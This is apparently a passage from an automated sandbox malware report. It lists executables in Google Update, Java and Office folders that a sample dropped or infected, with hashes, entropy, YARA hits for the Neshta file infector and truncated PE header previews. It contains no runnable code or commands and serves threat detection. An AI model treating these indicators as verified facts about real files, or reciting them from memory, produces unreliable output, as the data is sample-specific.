Process: C:\Users\user\Desktop\Z68mMCAxFZ.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.517183428602308
Encrypted: false
SSDEEP: 768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJPgOCegc5f3E/lwvSHazYLO0K/rdiiA9:JxqjQ+P04wsmJCznxUOoQXALA
MD5: 10CA92590C0A328CD9DD6B232AC5B97C
SHA1: CA9C9D94ACA6666E7655B9A7E3E11EAA23D84119
SHA-256: D6E3584260FE9CC093D4E7A33A66C201059296D5BBE30DFDFDD3AD76584192CD
SHA-512: 5D78BA107880C8D8FACF61EA5C097705E6410C8D2AF8D6D49540B19FD2DDAB9177080B6435D30B9E3448C81DA4C85943456F93A4F3F549DEFD0794AFE85CAD59
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleCrashHandler64.exe, Author: Joe Security

C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe
Process: C:\Users\user\Desktop\Z68mMCAxFZ.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.31341198420156
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJCMw0wAh3A5sWBMcdSJ+L94ltGTxv5ou:sr85CMuAt2Sk2m5ou
MD5: C5CBA627E9C4F07BF06013E2E19A2ADF
SHA1: B8678C954DE42C8D686384179EB1835E378C19E3
SHA-256: 0215077B4DAAC5B17314C2A55673E2416ADAD7CD34E8C33AE748AE22C59A2CC5
SHA-512: 234455B1C396B38DF98C569584C85CE153423CAC75E9E0DBCB724D9A0795FBCBE6D116185017535CC23ABAC49DCE9C77A9D8F470BE7B899E80C7C7E5086EE76F
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdate.exe, Author: Joe Security

C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe
Process: C:\Users\user\Desktop\Z68mMCAxFZ.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.571220400525005
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJC85J2AeSh8/J7YGzhc299YX:sr85CRgh2Bh1c27YX
MD5: 2CE4DFB3663A6C0B5EA20EA10DECE139
SHA1: A9D39DDD39D9419D1B0A836E9110BC5E7CE071DA
SHA-256: 006DC11C857D8EC872D4ECFB6CF70FB1BAB5C95AF8773BBEC11E07C2E0BEFC27
SHA-512: 0F25FF89C156ED21AFB55F07BE74C8B290C9E42710A3AE3917CE2FEAEE3626FA20E26F1088CF47CC487B18C69E3A1A3B560A321F63EAAB9A3F478822B2B0F904
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe, Author: Joe Security

C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe
Process: C:\Users\user\Desktop\Z68mMCAxFZ.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.35638621946935
Encrypted: false
SSDEEP: 768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJ1jaG5lO8Ao+MJo1So6lSvUpRGaCJ9K7:JxqjQ+P04wsmJCwNbRu+2Hdt5yG10x
MD5: 9AC378232CF66E98AC476EE00ACD8A6B
SHA1: ADDECA30D06C773A5C6D209646EC64DC0CDF3039
SHA-256: F3C6416304690DD5950F44E4721CE140B8932BE7C130204DEE2A623998F0F716
SHA-512: F14621706EF7E9E480A13E17B3A0764B93AE06EC6507C2401FC57D29D565397969A98091E373DF06A169C3005537A8E635610F1091AED5B64B8A22D9D253B46E
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe, Author: Joe Security

C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe
Process: C:\Users\user\Desktop\Z68mMCAxFZ.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.572547877647106
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJCBeljakK11t5rL6Tfr/sVKQ7t:sr85CBkjtQVrY/0
MD5: FDB7DA820D2F539A317A598BA31067C8
SHA1: C9D147B854A2BB03D782A3BA1C645C525DA0EBD8
SHA-256: 2D98E44BE09EDB2627AAB1A7AC69FF72CC7C06E24CA77B9F4C14A602B5DD78BB
SHA-512: 6195C603856129DB9310484D0FD09AF788FDACFC468EC21C3F99E6BE7718AC491D6E001048492C3A67F811EABC062432DCF0EAAE175489B1A63A6CED1E8D8692
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateCore.exe, Author: Joe Security

C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe
Process: C:\Users\user\Desktop\Z68mMCAxFZ.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.571346004771877
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJCjpJaUWSZknGE7YGzh82dlYX:sr85CSsZmGkh182jYX
MD5: 5BC82420D22E028C2481B8150AD4F793
SHA1: 9DE41D3BA5DBF3DC259110C5C34E216315DFD327
SHA-256: 2CAAF2C35A46F53327B11B7EE33B34E1DB112D5C83798BC1B1FEB11A7DD38DD1
SHA-512: 61A5207DAFC38941A87EBB47B835F212C4D4581F2E3EBE5FE2AEAA7E1D51221DD1805176B0925967B4934754092B364A1A40DEEB778E6817B6BAEC533B367D1A
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateOnDemand.exe, Author: Joe Security

C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe
Process: C:\Users\user\Desktop\Z68mMCAxFZ.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.5964179831347325
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJC3GoO5OLmk1uFQfI5367Kd8:sr85Cnm5Wi3h8
MD5: 49108FC1C6FF24CD49C200E2D7A44B86
SHA1: E79038C6363781BF92D4487BD77A4A770352E948
SHA-256: 06197B71B98A7C4FC08B2B354B6B5DE011BA11CF958827BEE3438B170A27F17F
SHA-512: 008A7A84B3BC2337AF59260348076CDEE1F3C507AD2BF4D2C567029E1F12594555D2BDC4B9BEB2AE77B29E07F7F02158806DB196BB1878D9018E34E7A7757FA1
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, Author: Joe Security

C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
Process: C:\Users\user\Desktop\Z68mMCAxFZ.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.653521772684421
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
MD5: 50B7F8BD51D8BEA4542C8B6FB7046568
SHA1: 46FE9571A136EEDD3DC35089F096D47B32EA74C8
SHA-256: 86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
SHA-512: 87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
Malicious: true

C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
Process: C:\Users\user\Desktop\Z68mMCAxFZ.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.330325009255707
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJC/rmKMmG2haDkdWIJ7OkUVS:sr85C/qzE+bgOkIS
MD5: 47848F50CD963815CF2894B7C284095C
SHA1: 8F8E03058352E172E9158782BC8E315D026CD720
SHA-256: 115C7F82BED3C1779F50CE53273248152587D8F9421B933C10534B84E16E7815
SHA-512: 9D692E732A6E0F673A2A4ACC6E7877976FCB2901A874D696ADF2A16EB55C08AB738744811AC9A6AFD5673F2FE272E2C6663B6EB123049F41FA5C1E68EBCD5A8E
Malicious: true
Yara Hits:
• Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, Author: Florian Roth
• Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, Author: Joe Security

C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
Process: C:\Users\user\Desktop\Z68mMCAxFZ.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.656070779362061
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
MD5: 60628C314BCF2A97CCFA9CB4241A2DAB
SHA1: 6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
SHA-256: FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
SHA-512: 2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
Malicious: true

C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
Process: C:\Users\user\Desktop\Z68mMCAxFZ.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 82944
Entropy (8bit): 6.6397427450636055
Encrypted: false
SSDEEP: 1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
MD5: 7132D6785E73B1159F3AC9AC5DE71A1C
SHA1: 0EF8C262E63E3776662064D00E5C4264D0213C8B
SHA-256: 629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
SHA-512: 804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
Malicious: true
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.346606571165856
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCOLIFaIz9SEhJyurf6S1TWfavAd3VbB:sr85Cb7hfFTkd33
                                                          MD5:95ED8DD6C4D471F68911840679CA1F9B
                                                          SHA1:5BDD0A4778F72B6AC95FEEFF108F74E342981690
                                                          SHA-256:82B98FAF27483CB4C8957A2BC6306C47D59559046C8DCDC03C708C77C36E2417
                                                          SHA-512:581BD049EDCEC4E330FEC670AF7B2980F1B338FC8588B596555803A43B0BE4232A3376CB314C8F3C9DC615D892D80746EB2E1C60766BDB7E046515DB9751DD8B
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.107296013528715
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCWnoDdvhQBW1kqanjaYt6Zs8:sr85CaEQQhanIZs8
                                                          MD5:4141A0DE0BCBE19FA9E93DB323462679
                                                          SHA1:88F7E506A247D882C4F4E924D1E3DAB0FC077387
                                                          SHA-256:3CD849C610540723B3785865DFCC8F65B820003251B39ED6594A8A979F20E948
                                                          SHA-512:940ED87A4C20AE138D388D2324AEBCCA2FC4C93B8D8C2443E91EB382937F79B55BDAD03F595C4EF3FA94D0EC087EA3C228ABB143BBCB79C554E5C3FA38CAA754
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.242980084696127
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCZqO55PvVT4zHu+wLZ8qU:sr85CIO55PvV8HVwLZ8qU
                                                          MD5:18E80CD6901FFDEDD81B44D0526240D4
                                                          SHA1:640A66FC69235A0B3677A010376FC607CC2B50E6
                                                          SHA-256:3A70FBA9C369E6FC2DB35AF45D1201833ADEB33B1ACE24603A582D2BACE6ACDF
                                                          SHA-512:4F62E2168BFCFD0329F12F93FB5783B9D70989852CF9C12339FDED1ACC5C984FCC847555DD223C6EE2C3CEF64DD95F580DB31138F9D2F47E68FF2F6106A3BED3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.2705620011183765
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCFtwbWR/v1o/G42UR9whwRrcUTR9EhhBhc:sr85CpnD9UR9whwtvTRMBy
                                                          MD5:F56F560D473A7660D3AD44E731930A06
                                                          SHA1:B71090C328FF4234B213D76689591DE15DEBD0F3
                                                          SHA-256:9B7384DC0D5DBA8C5161DB5C42D3075A4281716F741F10DEF974C5C680308CD0
                                                          SHA-512:0134B6C093C053343177A83B81A23EEE54BF4C655958906B854B221B85097D633FA96953B83343F6C207BE5A15919017EA26C05DD3B46193618FC26510C6E74F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.110851138659397
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCIbgvgvwvEvFvwYF57LoW8dwhFz7Oos8iwiFT7XMvNvev0vUvZo:sr85CIbMMc4ZTTfRyKFifVlt7wx+oIVg
                                                          MD5:4DA76295D7246E94AC917F192A2ACE84
                                                          SHA1:58964579A019BEAB01488F1B1FD0A83C4A38B0CB
                                                          SHA-256:D1D94327BEFFD6F453E862BFE9B715C980B20F33F38C8825AA2B2DF1DF33F9A5
                                                          SHA-512:8811B0CC2BDE08B9354AC1F84F441F7E3D11A31D7E5D25139E53DA4C2C2E99645A1F37FAA7FD043B4FCC1169DB59FF4F7BA8EAC9CAC14CD455B3CCD34B6BAAD2
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.46960810763993
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCwMkBExFhpgLTGlrFBbeEOCr:sr85CJ7uTGlr3iE5r
                                                          MD5:3AE73C8D42CF093E893717A04A20D5F8
                                                          SHA1:96384CCD613D795E953BFD876250C86007EF74D6
                                                          SHA-256:BAE7AFCEBAEF2A3BB243EFAF1305AED127D21B978D7C4335109F2A403A4C2CE1
                                                          SHA-512:C90A74241A93652AB10BD6E1D476D89C995C7749938B83877C14A8F9496959C8868F21239DC6C468629852D154621E310CA76FB4C50DF8C02626560D48F96E07
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.448388258977007
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZyKcXJKtm61b0fth1uvh/NYANLOT9j/:JxqjQ+P04wsmJCRXJQm62t+vTaT9jxd7
                                                          MD5:8BA32D4C4C59A22D2A5A1BEAB8B004C7
                                                          SHA1:AA91417C5BA67F09E743A7740662EED65C4873EA
                                                          SHA-256:2B0E0FBC461BED861EAF961F5058A18252A8A517008660D46063A1DCDF10DD02
                                                          SHA-512:07B9A4827EFDE249FBD6953ABE3559A589500534E8DBAFF12C65EAD40FDE51395822BD265AE48D271ECB825BF6EDEC3D7CB7D2D96FFCBB3AA167FF7FC1A64AF4
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.285196024262785
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCVJQEW8SSfaU/VEwdwzfnuktR9KJMkW:sr85CbQE2SkXFKJMt
                                                          MD5:2355BC5DCE8E63203BD523F6A3EF11C9
                                                          SHA1:06E09B957EC99F2635D39BD9D3EF6FB8C26FDD8F
                                                          SHA-256:37D5B62049B2ECBAC53E3126E68E2FA0416A2E220C97E9951BD71FFF52E514A9
                                                          SHA-512:71BCE642EDC4355E8CD217442EE6AEB1AA536069FAACA69633EF3B508A6E523FA2386A7EF841FC84F9EAF475725368DCC2CED0C0D4C13B170EE789A69FFDDCD7
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.72011826313205
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCa9IKr1BRo+SYZMuIb3eJG53B:sr85CaDr1BRo+SYZMuW32GhB
                                                          MD5:BD61FF1B20A7530ECF797894EE1316DC
                                                          SHA1:A9601D8B56C247B801E5D5A89377EEFA6FF37FA2
                                                          SHA-256:29F10DE4B67C8BF585A581AE8893069FA52214A18CC4444D3E207A7A657EBD02
                                                          SHA-512:CD91235FF8ACC7D8263EF05028E728E0BBA90D9459B3FD86568C7149DFF55F1E3E010C5234C234DA87B2CBFBE7B8C71DFEDD9E8C5BB326146579CA9EAD90055F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.169493808225336
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCslMDFepJnQxbMwwNOhO8WSnWR0Oj:sr85CsaeYyiL7WR0k
                                                          MD5:8F4A79DC0DD71E8CA092D84C0260F92D
                                                          SHA1:CEB13BACFAE68CFE94561487FC6E0AE0464C6A58
                                                          SHA-256:2480D138EE436D182337435EF36F9A895ED9A98DA620C752976D575C08ECD390
                                                          SHA-512:A100A527B654FE476672B7809A4C73F8C523C2620815476CF8D994E1553A344CFE4191FDF8641719D52B29743D625574A9287EF51BBF343B5D8FDD428FE68D33
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.3186383734960625
                                                          Encrypted:false
